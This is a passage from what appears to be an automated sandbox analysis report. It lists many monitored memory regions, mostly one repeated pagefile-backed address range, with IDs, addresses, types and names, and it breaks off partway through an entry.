Region: id = 5543 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5544 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5545 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5546 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5547 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5548 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5549 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5550 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5551 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5552 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 5553 start_va = 0x630000 end_va = 0x651fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 5554 start_va = 0x660000 end_va = 0x671fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 5610 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5611 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5612 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5613 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5614 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5615 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5616 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5617 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5618 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5619 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5620 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5621 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5622 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5623 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5624 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5625 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5626 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5627 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5628 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5629 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5630 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5631 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5632 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5633 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5634 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5683 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5684 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5685 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5686 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5687 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5688 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5689 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5690 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5691 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5692 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5693 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5694 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5695 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5696 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5697 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5698 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5699 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5700 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5701 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5702 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5703 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5704 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5705 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5706 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5752 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5753 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5754 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5755 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5756 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5757 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5758 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5759 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5760 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5761 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5762 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5763 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5764 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5765 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5766 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5767 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5768 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5769 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5770 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5771 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5772 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5773 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5835 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5836 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5837 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5838 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5839 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5840 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5841 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5842 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5843 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5844 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5845 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5846 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5847 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5848 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5849 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5850 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5851 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5852 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5853 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5854 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5855 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5856 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5857 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5916 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5917 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5918 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5919 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5920 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5921 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5922 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5923 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5924 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5925 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5926 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5927 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5928 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5929 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5930 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5931 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5932 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5933 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5934 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5935 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5936 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5937 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5980 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5981 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5982 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5983 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5984 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5985 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5986 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5987 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5988 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 5989 start_va = 0x630000 end_va = 0x651fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 5990 start_va = 0x660000 end_va = 0x671fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 5991 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5992 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5993 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5994 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5995 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 5996 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6000 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6001 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6002 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6003 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6004 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6005 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6006 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6007 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6008 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6009 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6010 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6011 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6012 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6013 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6014 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6015 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6016 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6017 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6018 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6019 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6020 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6021 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6022 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6023 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6024 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6025 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6026 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6027 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6028 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6029 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6030 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6031 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6032 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6033 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6034 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6035 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6036 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6037 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6038 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6039 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6040 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6041 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6042 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6043 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6044 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6045 start_va = 0x630000 end_va = 